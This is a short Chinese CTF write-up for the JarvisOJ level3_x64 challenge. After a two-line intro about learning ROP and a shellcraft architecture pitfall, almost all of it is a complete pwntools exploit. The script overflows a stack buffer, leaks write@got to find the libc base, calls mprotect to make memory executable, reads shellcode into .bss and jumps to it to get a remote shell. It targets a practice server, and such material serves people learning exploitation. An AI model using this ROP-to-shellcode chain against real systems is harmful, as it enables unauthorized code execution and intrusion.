本著紙上得來終覺淺，絕知此事要躬行的原則，把一個簡單的ROP做了一下。漏洞很明顯，libc有給出；唯一的限制就是用mprotect或者mmap

指令碼調了半天，最後發現是shellcode的問題；這裡邊的一個坑是shellcraft.sh()要指定一個目標平臺的架構，沒用過shellcraft模組，連這麼簡單的錯都犯，汗-_-||

from pwn import *

context.log_level='DEBUG'
r=remote('pwn2.jarvisoj.com',9883)
#r=process('./level3_x64',env={"LD_PRELOAD":"/root/JarvisOJ/level3_x64/libc-2.19.so
 
"})
file=ELF('./level3_x64')
libc=ELF('./libc-2.19.so')

prdi=0x4006b3
prsi=0x4006b1
bss_start=0x600A88
start_addr=0x4004F0
'''
    0x00000000004006b1 : pop rsi ; pop r15 ; ret
    0x0000000000001b8e : pop rdx ; ret
'''

payload1='a'*0x80+'b'*8+p64(prdi)+p64(1)+p64(prsi)+p64(file.got['write'])+'c'*8+p64(file.plt['write'])
payload1+=p64(start_addr)
r.recvuntil(
 
'\n')
r.send(payload1)
write_got=u64(r.recv(8))
sleep(1)

libc_base=write_got-libc.sym['write']
mprotect=libc_base+libc.sym['mprotect']
prdx=libc_base+0x1b8e
print hex(libc_base)
print hex(mprotect)
print hex(prdx)

payload2='a'*0x80+'b'*8+p64(prdi)+p64(0x600000)+p64(prsi)+p64(0x1000)+'c'*8+p64(prdx)+p64(7)+p64(mprotect)+p64(start_addr)
r.recvuntil(
 
'\n')
r.send(payload2)
sleep(1)
#gdb.attach(r)

payload3='a'*0x80+'b'*8+p64(prdi)+p64(0)+p64(prsi)+p64(bss_start)+'c'*8+p64(prdx)+p64(48)+p64(file.plt['read'])+p64(start_addr)
r.recvuntil('\n')
r.send(payload3)
sleep(1)
r.send(asm(shellcraft.amd64.linux.sh(),arch='amd64'))
#gdb.attach(r)

payload4='a'*0x80+'b'*8+p64(bss_start)
r.recvuntil('\n')
r.send(payload4)

r.interactive()